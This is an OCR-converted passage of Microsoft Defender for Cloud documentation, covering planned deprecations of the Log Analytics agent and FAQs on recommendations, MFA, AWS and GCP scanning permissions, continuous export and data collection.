DevOps Resource Deduplication for Defender 
for DevOps 


Estimated date for change: November 2023 


To improve the Defender for DevOps user experience and enable further integration 
with Defender for Cloud's rich set of capabilities, Defender for DevOps will no longer 
support duplicate instances of a DevOps organization to be onboarded to an Azure 
tenant. 


If you don't have an instance of a DevOps organization onboarded more than once to 
your organization, no further action is required. If you do have more than one instance 


of a DevOps organization onboarded to your tenant, the subscription owner will be 


notified and will need to delete the DevOps Connector(s) they don't want to keep by 
navigating to Defender for Cloud Environment Settings. 


Customers will have until November 14, 2023 to resolve this issue. After this date, only 
the most recent DevOps Connector created where an instance of the DevOps 
organization exists will remain onboarded to Defender for DevOps. For example, if 
Organization Contoso exists in both connectorA and connectorB, and connectorB was 
created after connectorA, then connectorA will be removed from Defender for DevOps. 


Changes to Attack Path's Azure Resource Graph 
table scheme 


Estimated date for change: November 2023 


The Attack Path's Azure Resource Graph (ARG) table scheme will be updated. The 
attackPathType property will be removed and additional properties will be added. 


Defender for Cloud plan and strategy for the 
Log Analytics agent deprecation 


Estimated date for change: August 2024 


The Azure Log Analytics agent, also known as the Microsoft Monitoring Agent (MMA) 
will be retired in August 2024.” As a result, features of the two Defender for Cloud 
plans that rely on the Log Analytics agent are impacted, and they have updated 
strategies: Defender for Servers and Defender for SQL Server on machines. 


Key strategy points 


e The Azure monitoring Agent (AMA) won't be a requirement of the Defender for 
Servers offering, but will remain required as part of Defender for SQL. 

e Defender for Servers MMA-based features and capabilities will be deprecated in 
their Log Analytics version in August 2024, and delivered over alternative 
infrastructures, before the MMA deprecation date. 

e In addition, the currently shared autoprovisioning process that provides the 
installation and configuration of both agents (MMA/AMA), will be adjusted 
accordingly. 


Defender for Servers 


The following table explains how each capability will be provided after the Log Analytics 


agent retirement: 


Feature 


Defender for 
Endpoint/Defender for 
Cloud integration for 
down level machines 
(Windows Server 2012 
R2, 2016) 


OS-level threat 
detection (agent- 
based) 


Adaptive application 
controls 


Endpoint protection 
discovery 
recommendations 


Missing OS patches 
(system updates) 


Deprecation plan 


Defender for Endpoint integration 
that uses the legacy Defender for 
Endpoint sensor and the Log 
Analytics agent (for Windows Server 
2016 and Windows Server 2012 R2 
machines) won't be supported after 
August 2024. 


OS-level threat detection based on 
the Log Analytics agent won't be 
available after August 2024. A full list 
of deprecated detections will be 
provided soon. 


The current GA version based on the 
Log Analytics agent will be 
deprecated in August 2024, along 
with the preview version based on 
the Azure monitoring agent. 


The current GA recommendations to 
install endpoint protection and fix 
health issues in the detected 
solutions will be deprecated in 
August 2024. The preview 
recommendations available today 
over Azure Monitor agent (AMA) will 
be deprecated when the alternative is 
provided over Agentless Disk 
Scanning capability. 


Recommendations to apply system 
updates based on the Log Analytics 
agent won't be available after August 
2024. The preview version available 
today over Guest Configuration agent 
will be deprecated when the 
alternative is provided over MDVM 
premium capabilities. Support of this 


Alternative 


Enable the GA unified agent 
integration to maintain 
support for machines, and 
receive the full extended 
feature set. For more 
information, see Enable the 
Microsoft Defender for 
Endpoint integration. 


OS-level detections are 
provided by Defender for 
Endpoint integration and are 
already GA. 


Adaptive Application Controls 
feature as it is today will be 
discontinued, and new 
capabilities in the application 
control space (on top of what 
Defender for Endpoint and 
Windows Defender Application 
Control offer today) will be 
considered as part of future 
Defender for Servers roadmap. 


A new agentless version will be 
provided for discovery and 
configuration gaps by April 
2024. As part of this upgrade, 
this feature will be provided as 
a component of Defender for 
Servers plan 2 and Defender 
CSPM, and won't cover on- 
premises or Arc-connected 
machines. 


New recommendations, based 
on integration with Update 
Manager, are already in GA, 
with no agent dependencies. 


Feature Deprecation plan Alternative 


feature for Docker-hub and VMMS 
will be deprecated in Aug 2024 and 
will be considered as part of future 
Defender for Servers roadmap. 


OS misconfigurations The current GA version based onthe A new version, based on 


(Azure Security Log Analytics agent won't be integration with Premium 

Benchmark available after August 2024. The Microsoft Defender 

recommendations) current preview version that uses the Vulnerability Management, will 
Guest Configuration agent will be be available early in 2024, as 


deprecated as the Microsoft Defender part of Defender for Servers 
Vulnerability Management plan 2. 
integration becomes available. 


File integrity The current GA version based onthe A new version of this feature 

monitoring Log Analytics agent won't be will be provided based on 
available after August 2024. The FIM Microsoft Defender for 
Public Preview version based on Endpoint integration by April 


Azure Monitor Agent (AMA), will be 2024. 
deprecated when the alternative is 
provided over Defender for Endpoint. 


The 500-MB benefit for The 500-MB benefit for data 

data ingestion ingestion over the defined tables will 
remain supported via the AMA agent 
for the machines under subscriptions 
covered by Defender for Servers P2. 
Every machine is eligible for the 
benefit only once, even if both Log 
Analytics agent and Azure Monitor 
agent are installed on it. 


Log analytics and Azure Monitoring agents autoprovisioning 
experience 


The current provisioning process that provides the installation and configuration of both 
agents (MMA/AMA), will be adjusted according to the plan mentioned above: 


1. MMA auto-provisioning mechanism and its related policy initiative will remain 
optional and supported until August 2024 through the Defender for Cloud 
platform. 


2. In October 2023: 


a. The current shared ‘Log Analytics agent'/‘Azure Monitor agent’ auto- 
provisioning mechanism will be updated and applied to ‘Log Analytics agent’ 


only. 

i. Azure Monitor agent (AMA) related Public Preview policy initiatives will be 
deprecated and replaced with the new auto-provisioning process for Azure 
Monitor agent (AMA), targeting only Azure registered SQL servers (SQL 
Server on Azure VM/ Arc-enabled SQL Server). 


3. Current customers with AMA with the Public Preview policy initiative enabled will 
still be supported but are recommended to migrate to the new policy. 


To ensure the security of your servers and receive all the security updates from Defender 
for Servers, make sure to have Defender for Endpoint integration and agentless disk 
scanning enabled on your subscriptions. This will also keep your servers up-to-date with 
the alternative deliverables. 


Agents migration planning 


First, all Defender for Servers customers are advised to enable Defender for Endpoint 
integration and agentless disk scanning as part of the Defender for Servers offering, 
at no additional cost. This will ensure you are automatically covered with the new 
alternative deliverables, with no additional onboarding required. 


Following that, plan your migration plan according to your organization requirements: 


Azure Monitor agent FIM/EPP What should I do 
(AMA) required (for discovery/Baselined is 
Defender for SQL or required as part of Defender 


other scenarios) for Server 

No Yes You can remove MMA starting April 
2024, using GA version of Defender 
for Server capabilities according to 
your needs (preview versions will be 
available earlier) 

No No You can remove MMA starting now 

Yes No You can start migration from MMA to 
AMA now 

Yes Yes You can either start migration from 


MMA to AMA starting April 2024 or 
alternatively, you can use both agents 
side by side starting now. 


Customers with Log analytics Agent (MMA) enabled 


e If the following features are required in your organization: File Integrity Monitoring 
(FIM), Endpoint Protection recommendations, OS misconfigurations (security 
baselines recommendations), you can start retiring from MMA in April 2024 when 
an alternative will be delivered in GA (preview versions will be available earlier). 


e I the features mentioned above are required in your organization, and Azure 
Monitor agent (AMA) is required for other services as well, you can start migrating 
from MMA to AMA in April 2024. Alternatively, use both MMA and AMA to get all 
GA features, then remove MMA in April 2024. 


e I the features mentioned above are not required, and Azure Monitor agent (AMA) 
is required for other services, you can start migrating from MMA to AMA now. 
However, note that the preview Defender for Servers capabilities over AMA will be 
deprecated in April 2024. 


Customers with Azure Monitor agent (AMA) enabled 
No action is required from your end. 


e You'll receive all Defender for Servers GA capabilities through Agentless and 
Defender for Endpoint. The following features will be available in GA in April 2024: 
File Integrity Monitoring (FIM), Endpoint Protection recommendations, OS 
misconfigurations (security baselines recommendations). The preview Defender for 
Servers capabilities over AMA will be deprecated in April 2024. 


© Important 


For more information about how to plan for this change, see Microsoft Defender 
for Cloud - strategy and plan towards Log Analytics Agent (MMA) deprecation Z . 


Defender for SQL Server on machines 


The Defender for SQL Server on machines plan relies on the Log Analytics agent (MMA) 
/ Azure monitoring agent (AMA) to provide Vulnerability Assessment and Advanced 
Threat Protection to laaS SQL Server instances. The plan supports Log Analytics agent 
autoprovisioning in GA, and Azure Monitoring agent autoprovisioning in Public Preview. 


The following section describes the planned introduction of a new and improved SQL 
Server-targeted Azure monitoring agent (AMA) autoprovisioning process and the 
deprecation procedure of the Log Analytics agent (MMA). On-premises SQL servers 
using MMA will require the Azure Arc agent when migrating to the new process due to 
AMA requirements. Customers who use the new autoprovisioning process will benefit 


from a simple and seamless agent configuration, reducing onboarding errors and 
providing broader protection coverage. 


Milestone Date More information 

SQL-targeted AMA October The new autoprovisioning process will only target Azure 
autoprovisioning 2023 registered SQL servers (SQL Server on Azure VM/ Arc- 
Public Preview release enabled SQL Server). The current AMA autoprovisioning 


process and its related policy initiative will be deprecated. 
It can still be used customers, but they won't be eligible 
for support. 


SQL-targeted AMA December GA release of a SQL-targeted AMA autoprovisioning 

autoprovisioning GA 2023 process. Following the release, it will be defined as the 

release default option for all new customers. 

MMA deprecation August The current MMA autoprovisioning process and its related 
2024 policy initiative will be deprecated. It can still be used 


customers, but they won't be eligible for support. 


Deprecating two security incidents 


Estimated date for change: November 2023 


Following quality improvement process, the following security incidents are set to be 
deprecated: Security incident detected suspicious virtual machines activity and 


Security incident detected on multiple machines. 


Next steps 


For all recent changes to Defender for Cloud, see What's new in Microsoft Defender for 
Cloud?. 


Common questions - General 
questions 


FAQ 


What is Microsoft Defender for Cloud? 


Microsoft Defender for Cloud helps you prevent, detect, and respond to threats with 
increased visibility into and control over the security of your resources. It provides 
integrated security monitoring and policy management across your subscriptions, helps 
detect threats that might otherwise go unnoticed, and works with a broad ecosystem of 
security solutions. 


Defender for Cloud uses monitoring components to collect and store data. For in-depth 
details, see Data collection in Microsoft Defender for Cloud. 


How do | get Microsoft Defender for 
Cloud? 


Microsoft Defender for Cloud is enabled with your Microsoft Azure subscription and 
accessed from the Azure portal Z . To access it, sign in to the portal“, select Browse, 
and scroll to Defender for Cloud. 


Which Azure resources are monitored 
by Microsoft Defender for Cloud? 


Microsoft Defender for Cloud monitors the following Azure resources: 


e Virtual machines (VMs) (including Cloud Services) 
e Virtual Machine Scale Sets 
e The many Azure PaaS services listed in the product overview 


Defender for Cloud also protects on-premises resources and multicloud resources, 
including Amazon AWS and Google Cloud. 


How can | see the current security state 
of my Azure, multicloud, and on- 
premises resources? 


The Defender for Cloud Overview page shows the overall security posture of your 
environment broken down by Compute, Networking, Storage & data, and Applications. 
Each resource type has an indicator showing identified security vulnerabilities. Clicking 
each tile displays a list of security issues identified by Defender for Cloud, along with an 
inventory of the resources in your subscription. 


What is a security initiative? 


A security initiative defines the set of controls (policies) that are recommended for 
resources within the specified subscription. In Microsoft Defender for Cloud, you assign 
initiatives for your Azure subscriptions, AWS accounts, and GCP projects according to 
your company's security requirements and the type of applications or sensitivity of the 
data in each subscription. 


The security policies enabled in Microsoft Defender for Cloud drive security 
recommendations and monitoring. Learn more in What are security policies, initiatives, 


and recommendations?. 


Who can modify a security policy? 


To modify a security policy, you must be a Security Administrator or an Owner of that 
subscription. 


To learn how to configure a security policy, see Setting security policies in Microsoft 
Defender for Cloud. 


What is a security recommendation? 


Microsoft Defender for Cloud analyzes the security state of your Azure, multicloud, and 
on-premises resources. When potential security vulnerabilities are identified, 
recommendations are created. The recommendations guide you through the process of 
configuring the needed control. Examples are: 


e Provisioning of anti-malware to help identify and remove malicious software 
e Network security groups and rules to control traffic to virtual machines 


e Provisioning of a web application firewall to help defend against attacks targeting 
your web applications 

e Deploying missing system updates 

e Addressing OS configurations that do not match the recommended baselines 


Only recommendations that are enabled in Security Policies are shown here. 


What triggers a security alert? 


Microsoft Defender for Cloud automatically collects, analyzes, and fuses log data from 
your Azure, multicloud, and on-premises resources, the network, and partner solutions 
like antimalware and firewalls. When threats are detected, a security alert is created. 
Examples include detection of: 


e Compromised virtual machines communicating with known malicious IP addresses 

e Advanced malware detected using Windows error reporting 

e Brute force attacks against virtual machines 

e Security alerts from integrated partner security solutions such as Anti-Malware or 
Web Application Firewalls 


What's the difference between threats 
detected and alerted on by Microsoft 
Security Response Center versus 
Microsoft Defender for Cloud? 


The Microsoft Security Response Center (MSRC) performs select security monitoring of 
the Azure network and infrastructure and receives threat intelligence and abuse 
complaints from third parties. When MSRC becomes aware that customer data has been 
accessed by an unlawful or unauthorized party or that the customer's use of Azure does 
not comply with the terms for Acceptable Use, a security incident manager notifies the 
customer. Notification typically occurs by sending an email to the security contacts 
specified in Microsoft Defender for Cloud or the Azure subscription owner if a security 
contact is not specified. 


Defender for Cloud is an Azure service that continuously monitors the customer's Azure, 
multicloud, and on-premises environment and applies analytics to automatically detect 
a wide range of potentially malicious activity. These detections are surfaced as security 
alerts in the workload protection dashboard. 


How can I track who in my organization 
enabled a Microsoft Defender plan in 
Defender for Cloud? 


Azure Subscriptions may have multiple administrators with permissions to change the 
pricing settings. To find out which user made a change, use the Azure Activity Log. 


Activity log 2 & x 


WV Activity == Edit columns O Refresh GO Diagnostics settings 4 Download as CSV A) Logs E Pin current filters DE Reset filters 
|2 Search ] ZO Quick Insights 
Management Group : None Subscription : 50 selected Event severity AI Timespan : Last 6 hours ko Add Filter 


First 542 items. 


Operation name Status Time Time stamp Subscription Event initiated by 

> @ Update pricing settings Succeeded 18 minutes.. Tue Nov 24.. Contoso77 demo kbell@contoso.com 

> @ Create or Update Virtual Network Subnet Failed 18 minutes... Tue Nov 24... ASC DEMO cln850ce074-95c4-462e-8... 
> @ Create or Update Virtual Network Subnet Failed 18 minutes... Tue Nov 24... ASC DEMO cln850ce074-95c4-462e-8... 
> @ Create or Update Virtual Network Subnet Failed 18 minutes... Tue Nov 24... ASC DEMO cln850ce074-95c4-462e-8... 
> @ Update website extension Succeeded 19 minutes... Tue Nov 24... Contoso Hotels - Dev Azure Application Change... 


If the user's info isn't listed in the Event initiated by column, explore the event's JSON 
for the relevant details. 


Activity log 2 & Update pricing settings 


Sun Dec 13 2020 17:36:46 GMT+0200 (Israel Standard Time) 


\ Activity == Edit columns O Refresh 3 Diagnostics settings d Download as CSV -+ New alert rule 


1 ae Summary | JSON | Change history (Preview) 
D Search | 2 Quick Insights 


“http: //schemas.xmlsoap.org/ws/2005/@5/identity/claims/name™ d 


Management Group : None Subscription : ProdTest2 Timespan : Last 6 hours “tony @contoso.com”, 
33 Pers qo xscape 
ZE “tony @contoso.com", - 3 
E z 34 uti": "7dnspKTESkiSqRBGQweMAQ”, 
e ‘ ree bie 35 "ver": "1.0", 
Operation name Status Time Time stamp Subscription Event initiated by 36 "xms_tcdt": "1289241547" 
37 b 
@ Create policy assignment Started 3 minutes a.. Sun Dec 13... ProdTest2 Windows Azure Securi... 38 “correlationId": "9ade940a-7140-4a4f-923e-19198eb7e819", 
39 "description A 
@ Update pricing settings Started 3 minutes a.. Sun Dec 13... ProdTest2 tony@contoso.com 40 "eventDataId b0390264-62f3-49e5-be88-62ebff308840", 
41 “eventName”: { 
42 “value”: "BeginRequest”, 
43 "“localizedValue": "Begin request” 
“4 h 
45 “category”: { 
46 “value”: “Administrative”, 
47 “localizedvalue”: “Administrative” 
48 


“eventTimestamp": "202@-12-13T15:36:46.3505@87Z", 
"id": "/subscriptions/e4cd6fff/providers/ 


What happens when one 
recommendation is in multiple policy 
Initiatives? 


Sometimes, a security recommendation appears in more than one policy initiative. If 
you've got multiple instances of the same recommendation assigned to the same 
subscription, and you create an exemption for the recommendation, it will affect all of 
the initiatives that you have permission to edit. 


If you try to create an exemption for this recommendation, you'll see one of the two 
following messages: 


e |f you have the necessary permissions to edit both initiatives, you'll see: 


This recommendation is included in several policy initiatives: [initiative names 


separated by comma]. Exemptions will be created on all of them. 


e |f you don't have sufficient permissions on both initiatives, you'll see this message 
instead: 


You have limited permissions to apply the exemption on all the policy initiatives, the 
exemptions will be created only on the initiatives with sufficient permissions. 


Are there any recommendations that 
don't support exemption? 


These generally available recommendations don't support exemption: 


e All advanced threat protection types should be enabled in SQL managed instance 
advanced data security settings 

e All advanced threat protection types should be enabled in SQL server advanced 
data security settings 

e Container CPU and memory limits should be enforced 

e Container images should be deployed from trusted registries only 

e Container with privilege escalation should be avoided 

e Containers sharing sensitive host namespaces should be avoided 

e Containers should listen on allowed ports only 

e Default IP Filter Policy should be Deny 

e Immutable (read-only) root filesystem should be enforced for containers 

e loT Devices - Open Ports On Device 

e loT Devices - Permissive firewall policy in one of the chains was found 

e loT Devices - Permissive firewall rule in the input chain was found 

e loT Devices - Permissive firewall rule in the output chain was found 

e |P Filter rule large IP range 

e Least privileged Linux capabilities should be enforced for containers 

e Overriding or disabling of containers AppArmor profile should be restricted 


e Privileged containers should be avoided 

e Running containers as root user should be avoided 

e Services should listen on allowed ports only 

e SQL servers should have an Microsoft Entra administrator provisioned 

e Usage of host networking and ports should be restricted 

e Usage of pod HostPath volume mounts should be restricted to a known list to 


restrict node access from compromised containers 


We're already using conditional access 
(CA) policy to enforce MFA. Why do we 
still get the Defender for Cloud 
recommendations? 


To investigate why the recommendations are still being generated, verify the following 
configuration options in your MFA CA policy: 


e You've included the accounts in the Users section of your MFA CA policy (or one of 
the groups in the Groups section) 

e The Azure Management app ID (797f4846-ba00-4fd7-ba43-dac1f8f63013), or all 
apps, are included in the Apps section of your MFA CA policy 

e The Azure Management app ID isn't excluded in the Apps section of your MFA CA 
policy 

e OR condition is used with only MFA, or AND condition is used with MFA 


We're using a third-party MFA tool to 
enforce MFA. Why do we still get the 
Defender for Cloud recommendations? 


Defender for Cloud's MFA recommendations doesn't support third-party MFA tools (for 
example, DUO). 


If the recommendations are irrelevant for your organization, consider marking them as 
"mitigated" as described in Exempting resources and recommendations from your 
secure score. You can also disable a recommendation. 


Why does Defender for Cloud show user 
accounts without permissions on the 
subscription as "requiring MFA"? 


Defender for Cloud's MFA recommendations refers to Azure RBAC roles and the Azure 
classic subscription administrators role. Verify that none of the accounts have such roles. 


We're enforcing MFA with PIM. Why are 
PIM accounts shown as noncompliant? 


Defender for Cloud's MFA recommendations currently doesn't support PIM accounts. 
You can add these accounts to a CA Policy in the Users/Group section. 


Can | exempt or dismiss some of the 
accounts? 


The capability to exempt some accounts that don't use MFA is available on the new 
recommendations in preview: 


e Accounts with owner permissions on Azure resources should be MFA enabled 
e Accounts with write permissions on Azure resources should be MFA enabled 
e Accounts with read permissions on Azure resources should be MFA enabled 


To exempt account(s), follow these steps: 


1. Select an MFA recommendation associated with an unhealthy account. 
2. In the Accounts tab, select an account to exempt. 

3. Select the three dots button, then select Exempt account. 

4. Select a scope and exemption reason. 


If you would like to see which accounts are exempt, navigate to Exempted accounts for 
each recommendation. 
Tip 


When you exempt an account, it won't be shown as unhealthy and won't cause a 
subscription to appear unhealthy. 


Are there any limitations to Defender 
for Cloud's identity and access 
protections? 


There are some limitations to Defender for Cloud's identity and access protections: 


e Identity recommendations aren't available for subscriptions with more than 6,000 
accounts. In these cases, these types of subscriptions will be listed under Not 
applicable tab. 

e Identity recommendations aren't available for Cloud Solution Provider (CSP) 
partner's admin agents. 

e Identity recommendations don't identify accounts that are managed with a 
privileged identity management (PIM) system. If you're using a PIM tool, you might 
see inaccurate results in the Manage access and permissions control. 

e Identity recommendations don't support Microsoft Entra conditional access 
policies with included Directory Roles instead of users and groups. 


What operating systems for my EC2 
instances are supported? 
For a list of the AMIs with the SSM Agent preinstalled see this page in the AWS docs &. 


For other operating systems, the SSM Agent should be installed manually using the 


following instructions: 


e Install SSM Agent for a hybrid environment (Windows) E 
e Install SSM Agent for a hybrid environment (Linux) Z 


For the CSPM plan, what IAM 
permissions are needed to discover 
AWS resources? 


The following IAM permissions are needed to discover AWS resources: 
DataCollector AWS Permissions 


API Gateway apigateway:GET 


DataCollector AWS Permissions 


Application Auto Scaling application-autoscaling:Describe* 


Auto scaling autoscaling-plans:Describe* 


autoscaling:Describe* 


Certificate manager acm-pca:Describe* 
acm-pca:List* 
acm:Describe* 


acm:List* 


CloudFormation cloudformation:Describe* 


cloudformation:List* 


CloudFront cloudfront:DescribeFunction 
cloudfront:GetDistribution 
cloudfront:GetDistributionConfig 


cloudfront:List* 


CloudtTrail cloudtrail:Describe* 
cloudtrail:GetEventSelectors 
cloudtrail:List* 


cloudtrail:LookupEvents 


CloudWatch cloudwatch:Describe* 


cloudwatch:List* 


CloudWatch logs logs :DescribeLogGroups 


logs:DescribeMetricFilters 


CodeBuild codebuild:DescribeCodeCoverages 
codebuild:DescribeTestCases 


codebuild:List* 


Config Service config:Describe* 


config: List* 


DMS - database migration service dms :Describe* 


dms:List* 


DAX dax:Describe* 


DataCollector AWS Permissions 
DynamoDB dynamodb: Describe* 


dynamodb: List* 


Ec2 ec2:Describe* 


ec2:GetEbsEncryptionByDefault 


ECR ecr:Describe* 
ecr:List* 
ECS ecs:Describe* 
ecs:List* 
EFS elasticfilesystem:Describe* 
EKS eks :Describe* 
eks:List* 
Elastic Beanstalk elasticbeanstalk:Describe* 


elasticbeanstalk:List* 


ELB — elastic load balancing (v1/2) elasticloadbalancing:Describe* 
Elastic search es:Describe* 

es:List* 
EMR - elastic map reduce elasticmapreduce:Describe* 


elasticmapreduce:GetBlockPublicAccessConfiguration 
elasticmapreduce:List* 


elasticmapreduce:View* 


GuardDuty guardduty :DescribeOrganizationConfiguration 
guardduty :DescribePublishingDestination 


guardduty:List* 


IAM iam:Generate* 
iam:Get* 
iam:List* 


iam:Simulate* 


DataCollector AWS Permissions 


KMS kms :Describe* 
kms:List* 
Lambda lambda: GetPolicy 


lambda: List* 


Network firewall network-firewall :DescribeFirewall 
network-firewall:DescribeFirewallPolicy 
network-firewall:DescribeLoggingConfiguration 
network-firewall:DescribeResourcePolicy 
network-firewall:DescribeRuleGroup 
network-firewall:DescribeRuleGroupMetadata 
network-firewall:ListFirewallPolicies 
network-firewall:ListFirewalls 
network-firewall:ListRuleGroups 


network-firewall:ListTagsForResource 


RDS rds :Describe* 
rds:List* 

RedShift redshift :Describe* 

S3 and S3Control 53:DescribeJob 


s3:GetEncryptionConfiguration 
s3:GetBucketPublicAccessBlock 
s3:GetBucketTagging 
s3:GetBucketLogging 
s3:GetBucketAcl 
s3:GetBucketLocation 
s3:GetBucketPolicy 
s3:GetReplicationConfiguration 
s3:GetAccountPublicAccessBlock 
s3:GetObjectAcl 
s3:GetObjectTagging 

eg Eiza 


SageMaker sagemaker :Describe* 
sagemaker :GetSearchSuggestions 
sagemaker:List* 


sagemaker : Search 


DataCollector AWS Permissions 


Secret manager secretsmanager :Describe* 


secretsmanager:List* 


Simple notification service — SNS sns :Check* 
sns:List* 

SSM ssm:Describe* 
ssm:List* 

SQS sqs:List* 


sqs:Receive* 
STS sts:GetCallerIdentity 


WAF waf-regional:Get* 
waf-regional:List* 
waf:List* 
wafv2:CheckCapacity 
wafv2:Describe* 


wafv2:List* 


Is there an API for connecting my GCP 
resources to Defender for Cloud? 


Yes. To create, edit, or delete Defender for Cloud cloud connectors with a REST API, see 
the details of the Connectors API. 


What GCP regions are supported by 
Defender for Cloud? 


Defender for Cloud supports and scans all available regions on GCP public cloud. 


Does workflow automation support any 
business continuity or disaster recovery 


(BCDR) scenarios? 


When preparing your environment for BCDR scenarios, where the target resource is 
experiencing an outage or other disaster, it's the organization's responsibility to prevent 
data loss by establishing backups according to the guidelines from Azure Event Hubs, 
Log Analytics workspace, and Logic Apps. 


For every active automation, we recommend you create an identical (disabled) 
automation and store it in a different location. When there's an outage, you can enable 


these backup automations and maintain normal operations. 


Learn more about Business continuity and disaster recovery for Azure Logic Apps. 


What are the costs involved in 
exporting data? 


There's no cost for enabling a continuous export. Costs might be incurred for ingestion 
and retention of data in your Log Analytics workspace, depending on your configuration 
there. 


Many alerts are only provided when you've enabled Defender plans for your resources. 
A good way to preview the alerts you'll get in your exported data is to see the alerts 
shown in Defender for Cloud's pages in the Azure portal. 


Learn more about Log Analytics workspace pricing Z. 
Learn more about Azure Event Hubs pricing £. 


For general information about Defender for Cloud pricing, see the pricing page”. 


Does the continuous export include 
data about the current state of all 
resources? 

No. Continuous export is built for streaming of events: 


e Alerts received before you enabled export won't be exported. 
e Recommendations are sent whenever a resource's compliance state changes. For 


example, when a resource turns from healthy to unhealthy. Therefore, as with 


alerts, recommendations for resources that haven't changed state since you 
enabled export won't be exported. 

e Secure score per security control or subscription is sent when a security control's 
score changes by 0.01 or more. 

e Regulatory compliance status is sent when the status of the resource's compliance 
changes. 


Why are recommendations sent at 
different intervals? 


Different recommendations have different compliance evaluation intervals, which can 
range from every few minutes to every few days. So, the amount of time that it takes for 
recommendations to appear in your exports varies. 


How can I get an example query for a 
recommendation? 


To get an example query for a recommendation, open the recommendation in Defender 


for Cloud, select Open query, and then select Query returning security findings. 


Home > Microsoft Defender for Cloud | Recommendations 


Container registry images should have vulnerability findings resolved (powered by Qualys) 
© Exempt © Disable rule ZZ View policy definition KA Open query 
Query returning affected resources 
Unhealthy registries Severity Vulnerabilities by severity | 


E 2/3 | High Query returning security findings High 4s q 


Query returning security findings Medium e pa 


Low 0 { 


Does continuous export support any 
business continuity or disaster recovery 
(BCDR) scenarios? 


Continuous export can be helpful in to prepare for BCDR scenarios where the target 
resource is experiencing an outage or other disaster. However, it's the organization's 
responsibility to prevent data loss by establishing backups according to the guidelines 
from Azure Event Hubs, Log Analytics workspace, and Logic App. 


Learn more in Azure Event Hubs - Geo-disaster recovery. 


Next steps 


Learn about what's new in Defender for Cloud 


Common questions about 
permissions in Defender for Cloud 


FAQ 


How do permissions work in Microsoft 
Defender for Cloud? 


Microsoft Defender for Cloud uses Azure role-based access control (Azure RBAC), which 
provides built-in roles that can be assigned to users, groups, and services in Azure. 


Defender for Cloud assesses the configuration of your resources to identify security 
issues and vulnerabilities. In Defender for Cloud, you only see information related to a 
resource when you're assigned the role of Owner, Contributor, or Reader for the 
subscription or resource group that a resource belongs to. 


See Permissions in Microsoft Defender for Cloud to learn more about roles and allowed 
actions in Defender for Cloud. 


Who can modify a security policy? 


To modify a security policy, you must be a Security Admin or an Owner or Contributor of 


that subscription. 


To learn how to configure a security policy, see Setting security policies in Microsoft 
Defender for Cloud. 


Which permissions are used by 
agentless scanning? 


The roles and permissions used by Defender for Cloud to perform agentless scanning 
on your Azure, AWS, and GCP environments are listed here. In Azure, these permissions 
are automatically added to your subscriptions when you enable agentless scanning. In 
AWS, these permissions are added to the CloudFormation stack in your AWS connector 
and in GCP permissions are added to the onboarding script in your GCP connector. 


e Azure permissions - The built-in role “VM scanner operator” has read-only 
permissions for VM disks that are required for the snapshot process. The detailed 


list of permissions is: 

Oo Microsoft.Compute/disks/read 

O Microsoft.Compute/disks/beginGetAccess/action 

Oo Microsoft.Compute/virtualMachines/instanceView/read 

O Microsoft.Compute/virtualMachines/read 

O Microsoft.Compute/virtualMachineScaleSets/instanceView/read 

Oo Microsoft.Compute/virtualMachineScaleSets/read 

O Microsoft.Compute/virtualMachineScaleSets/virtualMachines/read 

Oo Microsoft.Compute/virtualMachineScaleSets/virtualMachines/instanceView/rea 


d 


AWS permissions - The role “VmScanner” is assigned to the scanner when you 
enable agentless scanning. This role has the minimal permission set to create and 
clean up snapshots (scoped by tag) and to verify the current state of the VM. The 
detailed permissions are: 


Attribute Value 

SID VmScannerDeleteSnapshotAccess 

Actions ec2:DeleteSnapshot 

Conditions "StringEquals":{"ec2:Resourcelag/CreatedBy”: 


“Microsoft Defender for Cloud"} 


Resources arn:aws:ec2:::snapshot/ 

Effect Allow 

Attribute Value 

SID VmScannerAccess 

Actions ec2:ModifySnapshotAttribute 


ec2:DeleteTags 
ec2:CreateTags 
ec2:CreateSnapshots 
ec2:CopySnapshots 
ec2:CreateSnapshot 


Attribute 


Conditions 


Resources 


Effect 


Attribute 


SID 


Actions 


Conditions 


Resources 


Effect 


Attribute 


SID 


Actions 


Conditions 


Resources 


Effect 


Value 


None 


arn:aws:ec2:::instance/ 
arn:aws:ec2:::snapshot/ 
arn:aws:ec2:::volume/ 


Allow 


Value 


VmScannerVerificationAccess 


ec2:DescribeSnapshots 
ec2:DescribelnstanceStatus 


None 


Allow 


Value 


VmScannerEncryptionKeyCreation 


kms:CreateKey 


None 


Allow 


Attribute Value 


SID VmScannerEncryptionKeyManagement 


Actions kms:TagResource 
kms:GetKeyRotationStatus 
kms:PutKeyPolicy 
kms:GetKeyPolicy 
kms:CreateAlias 
kms:ListResourceTags 


Conditions None 


Resources arn:aws:kms::${AWS::Accountld}:key/ 
arn:aws:kms:*:${AWS::Accountld}:alias/DefenderForCloudKey 


Effect Allow 

Attribute Value 

SID VmScannerEncryptionKeyUsage 

Actions kms:GenerateDataKeyWithoutPlaintext 
kms:DescribeKey 


kms:RetireGrant 
kms:CreateGrant 
kms:ReEncryptFrom 


Conditions None 
Resources arn:aws:kms::${AWS::Accountld}:key/ 
Effect Allow 


e GCP permissions: during onboarding - a new custom role is created with minimal 
permissions required to get instances status and create snapshots. on top of that 
permissions to an existing GCP KMS role are granted to support scanning disks 
that are encrypted with CMEK. The roles are: 

o roles/MDCAgentlessScanningRole granted to Defender for Cloud's service 
account with permissions: compute.disks.createSnapshot, compute.instances.get 


o roles/cloudkms.cryptoKeyEncrypterDecrypter granted to Defender for Cloud's 
compute engine service agent 


What is the minimum SAS policy 
permissions required when exporting 
data to Azure Event Hubs? 


Send is the minimum SAS policy permissions required. For step-by-step instructions, see 
Step 1: Create an Event Hubs namespace and event hub with send permissions in this 
article. 


Common questions about data 
collection, agents, and 
workspaces 


FAQ 


Defender for Cloud collects data from your Azure virtual machines (VMs), Virtual 
Machine Scale Sets, laaS containers, and non-Azure computers (including on-premises 
machines) to monitor for security vulnerabilities and threats. The Log Analytics agent 
collects data, which reads various security-related configurations and event logs from 
the machine and copies the data to your workspace for analysis. 


Data collection 


How do | enable data collection? 


Data collection is automatically turned on when you enable a Defender plan that 


requires a monitoring component. 


What happens when data collection is enabled? 


When automatic provisioning is enabled, Defender for Cloud uses the Log Analytics 
agent on all supported Azure VMs and any new ones that are created. Automatic 
provisioning is recommended but manual agent installation is also available. Learn how 


to install the Log Analytics agent extension. 


The agent enables the process creation event 4688 and the CommandLine field inside 
event 4688. New processes created on the VM get recorded by the EventLog and 
monitored by Defender for Cloud's detection services. For more information on the 
details recorded for each new process, see description fields in 4688 z . The agent also 
collects the 4688 events created on the VM and stores them in search. 


